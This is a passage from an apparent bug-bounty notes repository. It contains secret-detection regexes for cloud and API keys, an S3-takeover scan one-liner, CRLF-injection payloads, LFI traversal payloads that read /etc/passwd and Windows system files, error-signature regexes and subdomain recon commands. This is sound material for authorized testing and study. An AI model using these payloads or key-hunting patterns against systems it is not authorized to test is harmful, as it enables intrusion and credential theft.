├── AWS.md ├── ApiKey.md ├── Buffer-Overflow.md ├── CRLF.md ├── CV ├── GochaOkradzeCV.pdf └── GochaOkradze_CV_EN.pdf ├── Cors-Origin.md ├── Crawl_Parameters.md ├── EndpointsExtractor.md ├── ErrorsAndVulnsDetect.md ├── Georgian-Recon.md ├── Gospider.md ├── IP_regex.md ├── Img ├── Screenshot from 2019-05-10 02-25-10.png ├── Screenshot from 2019-05-10 02-40-35.png ├── Screenshot from 2019-05-10 09-56-26.png ├── Screenshot from 2019-05-10 10-08-11.png └── empty.md ├── LFI.md ├── MyBugBountyMethodology.md ├── OpenRedirect_SSRF.md ├── RCE.md ├── README.md ├── ReconWithBurp_Suite.md ├── SQLiError.md ├── Secret_Patterns_db.MD ├── SubRegex.md ├── SubdomainsToBurp.md ├── Time-Based-SQLi.md ├── WEB APPLICATION PENTESTING CHECKLIST.pdf ├── WebDAV.md ├── bxss_js.md ├── content_discovery.md ├── file_upload.md ├── htmlattribs ├── paramName-inputTag.md ├── translate └── wahh-yandex-translate-ru.pdf ├── web ports.md ├── wordlists ├── 1.json ├── 2.json ├── README.md ├── b.json ├── blind-time-based-sqli-payloads.txt ├── common_api_paths.txt ├── content.txt ├── lfi-linux.txt ├── parameters.txt ├── s0md3v_XSS.txt ├── sensitive.txt ├── ssrf.txt ├── swagger.json ├── testSwagger │ ├── 06.json │ ├── c.json │ ├── j.json │ ├── q.json │ ├── t.json │ ├── w.json │ └── y.json └── xssAttacks.json ├── xpath.md ├── xss from img for S3 bucket.md ├── xss.md └── xxe.md /AWS.md: -------------------------------------------------------------------------------- 1 | # AWS 2 | Search AWS urls,keys in response body 3 | ### Regex 4 | 5 | AMAZON_URL: ```https?://[^\"\\'> ]``` 6 | 7 | AMAZON_URL_1: ```[a-z0-9.-]+\.s3-[a-z0-9-]\\.amazonaws\.com``` 8 | 9 | AMAZON_URL_2: ```[a-z0-9.-]+\.s3-website[.-](eu|ap|us|ca|sa|cn)``` 10 | 11 | AMAZON_URL_3: ```s3\\.amazonaws\.com/[a-z0-9._-]``` 12 | 13 | AMAZON_URL_4: ```s3-[a-z0-9-]+\.amazonaws\\.com/[a-z0-9._-]``` 14 | 15 | URLS: ```https?://[^\"\\'> ]``` 16 | 17 | AMAZON_KEY: ```([^A-Z0-9]|^)(AKIA|A3T|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{12,}``` 18 | 19 | UPLOAD_FIELDS: ```]\stype=[\"']?file[\"']?``` 20 | 21 | 22 | ### Scan for s3 bucket takeover vuln 23 | 24 | #### what you need 25 | * golang 26 | * subfinder or other subdomain collector tool: ```https://github.com/projectdiscovery/subfinder``` 27 | * gospider: ```https://github.com/jaeles-project/gospider``` 28 | * httpx: ```https://github.com/projectdiscovery/httpx``` 29 | * Oneliner terminal command 30 | 31 | ``` 32 | subfinder -d hackerone.com -silent | httpx -silent | gospider -d 5 --sitemap --robots -w -r --subs | grep "\[aws-s3" | sed 's/\[aws-s3\] - //g' | httpx -silent -mr "NoSuchBucket" | tee s3-bucket-takeover.txt 33 | ``` 34 | -------------------------------------------------------------------------------- /ApiKey.md: -------------------------------------------------------------------------------- 1 | # Api Key 2 | Detect Api key in request | response body 3 | 4 | How to use api key: https://github.com/streaak/keyhacks 5 | 6 | 7 | ### Keys: 8 | ATOMIST_API_KEY : ```\b[A-F0-9]{64}\b/``` 9 | 10 | TWITTER_ACCESS_TOKEN : ```[1-9][0-9]+-[0-9a-zA-Z]{40}``` 11 | 12 | FACEBOOK_ACCESS_TOKEN : ```EAACEdEose0cBA[0-9A-Za-z]+``` 13 | 14 | GOOGLE_API_KEY: ```AIza[0-9A-Za-z\-_]{35}``` 15 | 16 | GOOGLE_OAUTH_ID : ```[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com/``` 17 | 18 | PICATIC_API_KEY : ```sk_live_[0-9a-z]{32}``` 19 | 20 | STRIPE_REGULAR_API_KEY : ```sk_live_[0-9a-zA-Z]{24}``` 21 | 22 | STRIPE_RESTRICTED_API_KEY: ```rk_live_[0-9a-zA-Z]{24}``` 23 | 24 | SQUARE_OAUTH_TOKEN: ```sq0atp-[0-9A-Za-z\-_]{22}``` 25 | 26 | SQUARE_OAUTH_SECRET: ```sq0csp-[0-9A-Za-z\-_]{43}``` 27 | 28 | BRAINTREE_ACCESS_TOKEN: ```access_token\$production\$[0-9a-z]{16}\$[0-9a-f]{32}``` 29 | 30 | AMAZON_AUTH_TOKEN: ```amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}``` 31 | 32 | TWILLIO_API_KEY: ```SK[0-9a-fA-F]{32}``` 33 | 34 | MAILGUN_KEY: ```key-[0-9a-zA-Z]{32}``` 35 | 36 | MAILCHIMP_API_KEY: ```[0-9a-f]{32}-us[0-9]{1,2}``` 37 | 38 | AMAZON_ACCESS_KEY: ```\bAK[0-9A-Z]{18}\b``` 39 | 40 | GITHUB_TOKEN: ```(https?:\/\/)(?:v1\.)?[a-f0-9]{40}((?::x-oauth-basic)?@)``` 41 | 42 | URL_PASSWORD: ```((?:ht|f|sm)tps?:\/\/[^:/?#\[\]@""<>{}|\\^``\s]+:)[^:/?#\[\]@""<>{}|\\^``\s]+@``` 43 | 44 | slack_token: ```(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})``` 45 | 46 | slack_webhook: ```https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}``` 47 | 48 | facebook_oauth: ```[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].{0,30}['\"\s][0-9a-f]{32}['\"\s]``` 49 | 50 | twitter_oauth: ```[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\"\s][0-9a-zA-Z]{35,44}['\"\s]``` 51 | 52 | heroku_api: ```[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}``` 53 | 54 | google_captcha: ```6L[0-9A-Za-z-_]{38}``` 55 | 56 | google_oauth: ```ya29\.[0-9A-Za-z\-_]+``` 57 | 58 | 59 | 60 | 61 | #### Burp regexp 62 | 63 | ``` 64 | [0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com|[0-9a-f]{32}-us[0-9]{1,2}|[1-9][0-9]+-[0-9a-zA-Z]{40}|6L[0-9A-Za-z-_]{38}|AC[a-zA-Z0-9_\-]{32}|access_token\$production\$[0-9a-z]{16}\$[0-9a-f]{32}|AIza[0-9A-Za-z-_]{35}|AIza[0-9A-Za-z\-_]{35}|AKIA[0-9A-Z]{16}|amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}|AP[a-zA-Z0-9_\-]{32}|api[key|\s*]+[a-zA-Z0-9_\-]+|[a-zA-Z0-9_-]*:[a-zA-Z0-9_\-]+@github\.com*|\b[A-F0-9]{64}\b|\bAK[0-9A-Z]{18}\b|basic [a-zA-Z0-9_\-:\.]+|bearer [a-zA-Z0-9_\-\.]+|-----BEGIN PRIVATE KEY-----[a-zA-Z0-9\S]{100,}-----END PRIVATE KEY-----|-----BEGIN RSA PRIVATE KEY-----[a-zA-Z0-9\S]{100,}-----END RSA PRIVATE KEY-----|EAACEdEose0cBA[0-9A-Za-z]+|eyJ[a-zA-Z0-9]{10,}\.eyJ[a-zA-Z0-9]{10,}\.[a-zA-Z0-9_-]{10,}|[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].{0,30}['\"\s][0-9a-f]{32}['\"\s]|[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}|((?:ht|f|sm)tps?:\/\/[^:/?#\[\]@""<>{}|\\^``\s]+:)[^:/?#\[\]@""<>{}|\\^``\s]+@|https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}|(https?:\/\/)(?:v1\.)?[a-f0-9]{40}((?::x-oauth-basic)?@)|key-[0-9a-zA-Z]{32}|rk_live_[0-9a-zA-Z]{24}|s3\.amazonaws.com[/]+|[a-zA-Z0-9_-]*\.s3\.amazonaws.com|SK[0-9a-fA-F]{32}|sk_live_[0-9a-z]{32}|sk_live_[0-9a-zA-Z]{24}|sq0atp-[0-9A-Za-z\-_]{22}|sq0csp-[ 0-9A-Za-z\-_]{43}|sq0csp-[0-9A-Za-z\-_]{43}|sqOatp-[0-9A-Za-z\-_]{22}|[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\"\s][0-9a-zA-Z]{35,44}['\"\s]|(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})|ya29\.[0-9A-Za-z\-_]+ 65 | ``` 66 | -------------------------------------------------------------------------------- /Buffer-Overflow.md: -------------------------------------------------------------------------------- 1 | # Buffer Overflow 2 | Users have to know that detecting a buffer overflow vulnerability will be only possible if the server is configured to return errors, and the application is developed in cgi-c or some other language that allows the programmer to do their own memory management. 3 | 4 | #TODO: if lengths = ```[ 65 , 257 , 513 , 1025, 2049, 4097, 8000 ]``` then I get a BadStatusLine exception from urllib2, is seems to be an internal error. Tested against tomcat 5.5.7 5 | 6 | ### Payload 7 | Build Payloads 8 | Example: ```['A' * payload_len for payload_len in [65, 257, 513, 1025, 2049]]``` 9 | 10 | ### Errors 11 | ##### Regexp: 12 | ``` 13 | stack smashing detected |Backtrace|Memory map 14 | ``` 15 | 16 | ``` 17 | # Note that the lack of commas after the strings is intentional 18 | 19 | 500 Internal Server Error 20 | 21 |

Internal Server Error

22 | ``` 23 | ### Some notes: 24 | On Apache, when an overflow happends on a cgic script, this is written to the log 25 | ``` 26 | *** stack smashing detected *** 27 | 28 | /var/www/.../buffer_overflow.cgi terminated, 29 | referer: http://localhost/w3af/buffer_overflow.cgi 30 | 31 | Premature end of script headers: buffer_overflow.cgi, 32 | referer: ... 33 | 34 | On Apache, when an overflow happens on a cgic script, this is returned to the user: 35 | 36 | 37 | 38 | 500 Internal Server Error 39 | 40 |

Internal Server Error

41 |

The server encountered an internal error or 42 | misconfiguration and was unable to complete 43 | your request.

44 |

Please contact the server administrator, 45 | webmaster@localhost and inform them of the time the error 46 | occurred, 47 | and anything you might have done that may have 48 | caused the error.

49 |

More information about this error may be available 50 | in the server error log.

51 |
52 |
Apache/2.0.55 (Ubuntu) mod_python/3.2.8 Python/2.4.4c1 53 | PHP/5.1.6 Server at localhost Port 80
54 | 55 | 56 | Note that this is an Apache error 500, not the more common PHP error 500 57 | -------------------------------------------------------------------------------- /CRLF.md: -------------------------------------------------------------------------------- 1 | ### CRLF Injection 2 | 3 | #### Regexp 'Detect in response': 4 | ``` 5 | (?m)^Set-Cookie: crlf=injection 6 | ``` 7 | 8 | 9 | #### request payloads: 10 | 11 | ``` 12 | /%%0a0aSet-Cookie:crlf=injection 13 | /%0aSet-Cookie:crlf=injection 14 | /%0d%0aSet-Cookie:crlf=injection 15 | /%0dSet-Cookie:crlf=injection 16 | /%23%0aSet-Cookie:crlf=injection 17 | /%23%0d%0aSet-Cookie:crlf=injection 18 | /%23%0dSet-Cookie:crlf=injection 19 | /%25%30%61Set-Cookie:crlf=injection 20 | /%25%30aSet-Cookie:crlf=injection 21 | /%250aSet-Cookie:crlf=injection 22 | /%25250aSet-Cookie:crlf=injection 23 | /%2e%2e%2f%0d%0aSet-Cookie:crlf=injection 24 | /%2f%2e%2e%0d%0aSet-Cookie:crlf=injection 25 | /%2F..%0d%0aSet-Cookie:crlf=injection 26 | /%3f%0d%0aSet-Cookie:crlf=injection 27 | /%3f%0dSet-Cookie:crlf=injection 28 | /%u000aSet-Cookie:crlf=injection 29 | ``` 30 | -------------------------------------------------------------------------------- /CV/GochaOkradzeCV.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ghsec/webHunt/ea37c327ce7316b0ad2ae84d0dcac5bfdbdfb8e2/CV/GochaOkradzeCV.pdf -------------------------------------------------------------------------------- /CV/GochaOkradze_CV_EN.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ghsec/webHunt/ea37c327ce7316b0ad2ae84d0dcac5bfdbdfb8e2/CV/GochaOkradze_CV_EN.pdf -------------------------------------------------------------------------------- /Cors-Origin.md: -------------------------------------------------------------------------------- 1 | # Cors-Origin 2 | 3 | Inspect if application checks that the value of the "Origin" HTTP header is consistent with the value of the remote IP address/Host of the sender of the incoming HTTP request. 4 | 5 | 6 | ``` 7 | SENSITIVE_METHODS = ('PUT', 'DELETE') 8 | COMMON_METHODS = ('POST', 'GET', 'OPTIONS', 'PUT', 'DELETE') 9 | ``` 10 | 11 | Good example from H1 12 | https://hackerone.com/reports/235200 13 | 14 | ### Post based CORS Misconfiguration PoC 15 | 16 | ``` 17 | 18 | 35 | 36 | ``` 37 | -------------------------------------------------------------------------------- /Crawl_Parameters.md: -------------------------------------------------------------------------------- 1 | # Crawl parameters with getallurls 2 | 3 | - Download gau | link: https://github.com/lc/gau 4 | - Compile 5 | ```go build gau.go``` 6 | 7 | - Move ```gau``` to /usr/bin 8 | ```sudo mv gau /usr/bin``` 9 | 10 | ### Usage: 11 | ```gau -subs domain.com | grep -oP "(\?|\&)\w+" | tr -d "?|&" | sort -u | tee params``` 12 | 13 | ### GREP 14 | greping parameters in response body 15 | 16 | ```grep -oP "" | grep -oP "name=[\"'].+" | cut -d "\"" -f2``` 17 | 18 | ### crawl and Scan 19 | 20 | * Add this function in .bashrc file 21 | 22 | First need download and install htmlattribs by tomnomnom from repository 23 | 24 | https://github.com/tomnomnom/hacks/tree/master/htmlattribs 25 | 26 | ``` 27 | # Parameter scanner with Jaeles 28 | ### Input tag 29 | checkparam(){ 30 | for i in $(cat $1); do 31 | curl -sk "$i" | htmlattribs name input | tee params.txt 32 | jaeles scan -v -s ~/path_To_Jaeles_Signature/xss.yaml -u "$i" 33 | rm params.txt 34 | done 35 | } 36 | 37 | ``` 38 | 39 | * collect urls with your favorite tool. "Burp, gospider, hakrawler" 40 | * check urls which includer " tag" with ffuf 41 | 42 | ``` 43 | ffuf -u FUZZ -w urls.txt -mr "<,;|*()(%%$^/\\\[\]][^"'><,;|()]{1,})|([a-zA-Z0-9_\-/]{1,}/[a-zA-Z0-9_\-/]{1,}\.(?:[a-zA-Z]{1,4}|action)(?:[\?|/][^"|']{0,}|))|([a-zA-Z0-9_\-]{1,}\.(?:php|asp|aspx|jsp|json|action|html|js|txt|xml)(?:\?[^"|^']{0,}|)))(?:"|') 5 | ``` 6 | -------------------------------------------------------------------------------- /ErrorsAndVulnsDetect.md: -------------------------------------------------------------------------------- 1 | Copy this joined regexp and use in burp 2 | 3 | Need edit fuzzlist 4 | 5 | ### Fuzz List by @1N3 6 | 7 | https://github.com/1N3/IntruderPayloads/blob/master/FuzzLists/full_fuzz.txt 8 | 9 | ### Detect errors and vulnerabilities 10 | 11 | It is useful detect errors and vulns when fuzz with costum payloads list 12 | 13 | 14 | ``` 15 | injectx|stack smashing detected|Backtrace|Memory map|500 Internal Server Error|Set-Cookie:\scrlf=injection|java\.io\.FileNotFoundException|java\.lang\.Exception|java\.lang\.IllegalArgumentException|java\.net\.MalformedURLException|Warning: include\(|Warning: unlink\(|for inclusion \(include_path=|fread\(|Failed opening required|Warning: file_get_contents\(|Fatal error: require_once\(|Warning: file_exists\(|root:|(uid|gid|groups)=\d+|bytes from \b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b|Configuration File \(php\.ini\) Path |vulnerable 10|Trying \b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b|\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b\s+localhost|BROADCAST,MULTICAST|drwxr-xr|Active Internet connections|Syntax error|sh:|Average Speed Time|dir: cannot access||drwxrwxr|GNU/Linux|(Exception (condition )?\d+\. Transaction rollback|com\.frontbase\.jdbc|org\.h2\.jdbc|Unexpected end of command in statement \["|Unexpected token.*?in statement \[|org\.hsqldb\.jdbc|CLI Driver.*?DB2|DB2 SQL error|\bdb2_\w+\(|SQLSTATE.+SQLCODE|com\.ibm\.db2\.jcc|Zend_Db_(Adapter|Statement)_Db2_Exception|Pdo[./_\\]Ibm|DB2Exception|Warning.*?\Wifx_|Exception.*?Informix|Informix ODBC Driver|ODBC Informix driver|com\.informix\.jdbc|weblogic\.jdbc\.informix|Pdo[./_\\]Informix|IfxException|Warning.*?\Wingres_|Ingres SQLSTATE|Ingres\W.*?Driver|com\.ingres\.gcf\.jdbc|Dynamic SQL Error|Warning.*?\Wibase_|org\.firebirdsql\.jdbc|Pdo[./_\\]Firebird|Microsoft Access (\d+ )?Driver|JET Database Engine|Access Database Engine|ODBC Microsoft Access|Syntax error \(missing operator\) in query expression|Driver.*? SQL[\-\_\ ]*Server|OLE DB.*? SQL Server|\bSQL Server[^<"]+Driver|Warning.*?\W(mssql|sqlsrv)_|\bSQL Server[^<"]+[0-9a-fA-F]{8}|System\.Data\.SqlClient\.SqlException|(?s)Exception.*?\bRoadhouse\.Cms\.|Microsoft SQL Native Client error '[0-9a-fA-F]{8}|\[SQL Server\]|ODBC SQL Server Driver|ODBC Driver \d+ for SQL Server|SQLServer JDBC Driver|com\.jnetdirect\.jsql|macromedia\.jdbc\.sqlserver|Zend_Db_(Adapter|Statement)_Sqlsrv_Exception|com\.microsoft\.sqlserver\.jdbc|Pdo[./_\\](Mssql|SqlSrv)|SQL(Srv|Server)Exception|SQL syntax.*?MySQL|Warning.*?\Wmysqli?_|MySQLSyntaxErrorException|valid MySQL result|check the manual that corresponds to your (MySQL|MariaDB) server version|Unknown column '[^ ]+' in 'field list'|MySqlClient\.|com\.mysql\.jdbc|Zend_Db_(Adapter|Statement)_Mysqli_Exception|Pdo[./_\\]Mysql|MySqlException|\bORA-\d{5}|Oracle error|Oracle.*?Driver|Warning.*?\W(oci|ora)_|quoted string not properly terminated|SQL command not properly ended|macromedia\.jdbc\.oracle|oracle\.jdbc|Zend_Db_(Adapter|Statement)_Oracle_Exception|Pdo[./_\\](Oracle|OCI)|OracleException|PostgreSQL.*?ERROR|Warning.*?\Wpg_|valid PostgreSQL result|Npgsql\.|PG::SyntaxError:|org\.postgresql\.util\.PSQLException|ERROR:\s\ssyntax error at or near|ERROR: parser: parse error at or near|PostgreSQL query failed|org\.postgresql\.jdbc|Pdo[./_\\]Pgsql|PSQLException|SQL error.*?POS([0-9]+)|Warning.*?\Wmaxdb_|DriverSapDB|com\.sap\.dbtech\.jdbc|SQLite/JDBCDriver|SQLite\.Exception|(Microsoft|System)\.Data\.SQLite\.SQLiteException|Warning.*?\W(sqlite_|SQLite3::)|\[SQLITE_ERROR\]|SQLite error \d+:|sqlite3.OperationalError:|SQLite3::SQLException|org\.sqlite\.JDBC|Pdo[./_\\]Sqlite|SQLiteException|Warning.*?\Wsybase_|Sybase message|Sybase.*?Server message|SybSQLException|Sybase\.Data\.AseClient|com\.sybase\.jdbc)|System\.Xml\.XPath\.XPathException|MS\.Internal\.Xml|Unknown error in XPath|org\.apache\.xpath\.XPath|A closing bracket expected in|An operand in Union Expression does not produce a node-set|Cannot convert expression to a number|Document Axis does not allow any context Location Steps|Empty Path Expression|DOMXPath|Empty Relative Location Path|Empty Union Expression|Expected \'\)\' in|Expected node test or name specification after axis operator|Incompatible XPath key|Incorrect Variable Binding|libxml2 library function failed|libxml2|Invalid predicate|Invalid expression|xmlsec library function|xmlsec|error \'80004005\'|A document must contain exactly one root element|Expression must evaluate to a node-set|Expected token ']'|

msxml4\.dll<\/font>|

msxml3\.dll<\/font>|4005 Notes error: Query is not understandable|SimpleXMLElement::xpath|xmlXPathEval:|simplexml_load_string|parser error :|An error occured!|xmlParseEntityDecl|simplexml_load_string|xmlParseInternalSubset|DOCTYPE improperly terminated|Start tag expected|No declaration for attribute|No declaration for element|failed to load external entity|Start tag expected|Invalid URI: file:\/\/\/|Malformed declaration expecting version|Unicode strings with encoding|must be well-formed|Content is not allowed in prolog|org.xml.sax|SAXParseException|com.sun.org.apache.xerces|ParseError|nokogiri|REXML|XML syntax error on line|Error unmarshaling XML|conflicts with field|illegal character code|XML Parsing Error|SyntaxError|no root element|not well-formed|313374|ssrfhere 16 | ``` 17 | -------------------------------------------------------------------------------- /Georgian-Recon.md: -------------------------------------------------------------------------------- 1 | # Recon: 2 | 3 | ### OS: Ubuntu 4 | .................................................. 5 | 6 | ## საჭირო ხელსაწყოები. 7 | 1.[Golang ინსტალაცია](https://golang.org/doc/install) 8 | 9 | 2.[OwaspAmass](https://github.com/OWASP/Amass) 10 | 11 | 3.[Subfinder](https://github.com/projectdiscovery/subfinder) 12 | 13 | 4.[Findomain](https://github.com/Edu4rdSHL/findomain) 14 | 15 | 5.[Assetfinder](https://github.com/tomnomnom/assetfinder) 16 | 17 | 6.[Github-Search](https://github.com/gwen001/github-search) 18 | 19 | 7.[GoAltdns](https://github.com/subfinder/goaltdns) 20 | 21 | 8.[MassDns](https://github.com/blechschmidt/massdns) 22 | 23 | 9.[gau](https://github.com/lc/gau) 24 | 25 | 10.[GoSpider](https://github.com/jaeles-project/gospider) 26 | 27 | 11.[Jaeles](https://github.com/jaeles-project/jaeles) 28 | 29 | 12.[Ffuf](https://github.com/ffuf/ffuf) 30 | 31 | 13.[DirSearch](https://github.com/maurosoria/dirsearch) 32 | 33 | 14.[Httprobe](https://github.com/tomnomnom/httprobe) 34 | 35 | 36 | ## Wordlists: 37 | * [RobotsDisallowed](https://github.com/danielmiessler/RobotsDisallowed) 38 | * [SecLists Web Content](https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Content) 39 | * [content_discovery_nullenc0de](https://gist.github.com/nullenc0de/96fb9e934fc16415fbda2f83f08b28e7) 40 | * [content_discovery_all](https://gist.github.com/jhaddix/b80ea67d85c13206125806f0828f4d10) 41 | * [commonspeak2](https://github.com/assetnote/commonspeak2-wordlists) 42 | * [all.txt](https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056) 43 | 44 | 45 | ## Recon Subdomains 46 | 47 | - Owasp Amass : ```amass enum -d DOMAIN -o amass``` 48 | 49 | - Subfinder: ```subfinder -d DOMAIN -o subfinder``` 50 | 51 | - Findomain: ```findomain -t DOMAIN -o``` 52 | 53 | - Assetfinder: ```assetfinder DOMAIN | tee assetfinder``` 54 | 55 | - Gobuster: ```gobuster dns -d DOMAIN -w ~/PATH/all.txt -t 250 -o gobuste``` 56 | 57 | - github-search/github-subdomains.py: ```python3 github-subdomains.py -d DOMAIN -t ``` 58 | 59 | - https://securitytrails.com/list/apex_domain/DOMAIN ```GREP ან ვიყენებთ API-ს``` 60 | 61 | - https://subdomainfinder.c99.nl/ 62 | 63 | ### ამოვიღოთ უნიკალური subdomain-ები და შევინახოთ uniq ფაილში. 64 | ```cat * | sort -u | tee uniq``` 65 | 66 | ```rm # ვშლით ყველა ფაილს რომელიც აღარ გვჭირდება, ვტოვებთ მხოლოდ uniq ფაილს``` 67 | 68 | 69 | ### დავაგენერიროთ სავარაუდო საბდომენების საბდომენები და დავარეზოლვოთ. 70 | ``` goaltdns -l uniq -w all.txt -o generated``` 71 | 72 | ```massdns generated -r /massdns/lists/resolvers.txt -t A -o S -w results.txt``` 73 | 74 | ```sed 's/A.*//' result.txt | sed 's/CN.*//' | sed 's/\..$//' > massdns``` 75 | 76 | ```cat uniq massdns | sort -u | tee uniq.txt``` 77 | 78 | შესაძლებელი კიდე იგივე ოპერაცია გავიმეოროთ goaltdns-თან ერთად ოღონდ word.txt ფაილით. 79 | 80 | 81 | ### HttpProbe Live 82 | ```cat uniq.txt | httprobe | tee hosts``` 83 | 84 | -------------------------------------------------------------------------------- /Gospider.md: -------------------------------------------------------------------------------- 1 | # Spidering with Gospider 2 | [Gospider](https://github.com/jaeles-project/gospider) 3 | 4 | ### Collect Endpoints 5 | 6 | Collect URLs and save to file: 7 | ``` 8 | gospider -S hosts -d 16 -a -c 250 | tee gospider 9 | ``` 10 | 11 | ### Extract urls 12 | 13 | ``` 14 | cat gospider | grep -oP "http(s)?://((?i)(([a-zA-Z0-9]{1}|[_a-zA-Z0-9]{1}[_a-zA-Z0-9-]{0,61}[a-zA-Z0-9]{1})[.]{1})+)?domain.com.*" | tee extract 15 | ``` 16 | 17 | ### Sort unique urls 18 | 19 | ``` 20 | cat extract | sort -u | grep -oP "http(s)?://((?i)(([a-zA-Z0-9]{1}|[_a-zA-Z0-9]{1}[_a-zA-Z0-9-]{0,61}[a-zA-Z0-9]{1})[.]{1})+)?domain.com.*" | tee urls 21 | ``` 22 | 23 | -------------------------------------------------------------------------------- /IP_regex.md: -------------------------------------------------------------------------------- 1 | # IP Regex 2 | 3 | grep IP addresses from response 4 | 5 | ``` 6 | \b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b 7 | ``` 8 | -------------------------------------------------------------------------------- /Img/Screenshot from 2019-05-10 02-25-10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ghsec/webHunt/ea37c327ce7316b0ad2ae84d0dcac5bfdbdfb8e2/Img/Screenshot from 2019-05-10 02-25-10.png -------------------------------------------------------------------------------- /Img/Screenshot from 2019-05-10 02-40-35.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ghsec/webHunt/ea37c327ce7316b0ad2ae84d0dcac5bfdbdfb8e2/Img/Screenshot from 2019-05-10 02-40-35.png -------------------------------------------------------------------------------- /Img/Screenshot from 2019-05-10 09-56-26.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ghsec/webHunt/ea37c327ce7316b0ad2ae84d0dcac5bfdbdfb8e2/Img/Screenshot from 2019-05-10 09-56-26.png -------------------------------------------------------------------------------- /Img/Screenshot from 2019-05-10 10-08-11.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ghsec/webHunt/ea37c327ce7316b0ad2ae84d0dcac5bfdbdfb8e2/Img/Screenshot from 2019-05-10 10-08-11.png -------------------------------------------------------------------------------- /Img/empty.md: -------------------------------------------------------------------------------- 1 | empty file 2 | -------------------------------------------------------------------------------- /LFI.md: -------------------------------------------------------------------------------- 1 | ### LFI 2 | 3 | #### Errors: 4 | ``` 5 | Detect Payload: abc.txt 6 | ``` 7 | 8 | ##### Java Errors: 9 | ``` 10 | java\.io\.FileNotFoundException|java\.lang\.Exception|java\.lang\.IllegalArgumentException|java\.net\.MalformedURLException 11 | ``` 12 | ##### PHP Errors: 13 | ``` 14 | Warning: include\(|Warning: unlink\(|for inclusion \(include_path=|fread\(|Failed opening required|Warning: file_get_contents\(|Fatal error: require_once\(|Warning: file_exists\( 15 | ``` 16 | 17 | ##### Unix Payloads: 18 | ``` 19 | /..//..//..//..//..//..//..//..//..//..//..//..//..//..//../etc/passwd 20 | ../../../../../../../../../../../../../../../etc/passwd 21 | /..//..//..//..//..//..//..//..//..//..//..//..//..//..//../etc/passwd%00 22 | /..//..//..//..//..//..//..//..//..//..//..//..//..//..//../etc/passwd%00.html 23 | /etc/passwd 24 | ``` 25 | 26 | another type of LFI http://website/zen-cart/extras/curltest.php?url=file:///etc/passwd 27 | ``` 28 | file:///etc/passwd 29 | /etc/passwd%00 30 | /etc/passwd%00.html 31 | /etc/passwd%00.ext 32 | /..//..//..//..//..//..//..//..//..//..//..//..//..//..//../etc/passwd%00.ext 33 | ``` 34 | 35 | ##### Windows Payloads: 36 | ``` 37 | /..//..//..//..//..//..//..//..//..//..//..//..//..//..//../boot.ini 38 | ../../../../../../../../../../../../../../../boot.ini 39 | /..//..//..//..//..//..//..//..//..//..//..//..//..//..//../boot.ini%00 40 | /..//..//..//..//..//..//..//..//..//..//..//..//..//..//../boot.ini%00.html 41 | C:\\boot.ini 42 | C:\\boot.ini%00 43 | C:\\boot.ini%00.html 44 | %SYSTEMROOT%\\win.ini 45 | %SYSTEMROOT%\\win.ini%00 46 | %SYSTEMROOT%\\win.ini%00.html 47 | file:///C:/boot.ini 48 | file:///C:/win.ini 49 | C:\\boot.ini%00.ext 50 | %SYSTEMROOT%\\win.ini%00.ext 51 | ``` 52 | search in response 53 | ##### Regexp: 54 | ``` 55 | root:|for 16-bit app support|boot loader 56 | ``` 57 | Payloads: 58 | https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion/Intruders 59 | 60 | 61 | 62 | -------------------------------------------------------------------------------- /MyBugBountyMethodology.md: -------------------------------------------------------------------------------- 1 | # 1. Recon 2 | ## 1.1 Collect Subdomains 3 | 4 | Change "domain.com" with your domain 5 | 6 | ### ~ crt.sh 7 | ```$ curl -s https://crt.sh/?q=%25.domain.com\&output=json | jq '.[].name_value' | sort -u | sed 's/"//g' | sed '/^*/d'``` 8 | 9 | ### ~ certspotter 10 | ```$ curl -s https://certspotter.com/api/v0/certs\?domain\=domain.com | jq '.[].dns_names[]' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u | grep domain.com``` 11 | 12 | ### ~ Virustotal 13 | ```https://www.virustotal.com/gui/domain/domain.com/relations``` 14 | 15 | ### ~ SecurityTrails 16 | ```https://securitytrails.com/list/apex_domain/domain.com``` 17 | 18 | ### ~ Github 19 | ```https://github.com/search?q="domain.com"``` 20 | 21 | ### ~ Censys 22 | ```443.https.tls.certificate.parsed.names: domain.com``` 23 | 24 | ### ~ bgp 25 | ```https://bgp.he.net/``` 26 | 27 | ### ~ Findomain 28 | ```https://github.com/Edu4rdSHL/findomain``` 29 | 30 | ```findomain -t domain.com``` 31 | 32 | ### ~ 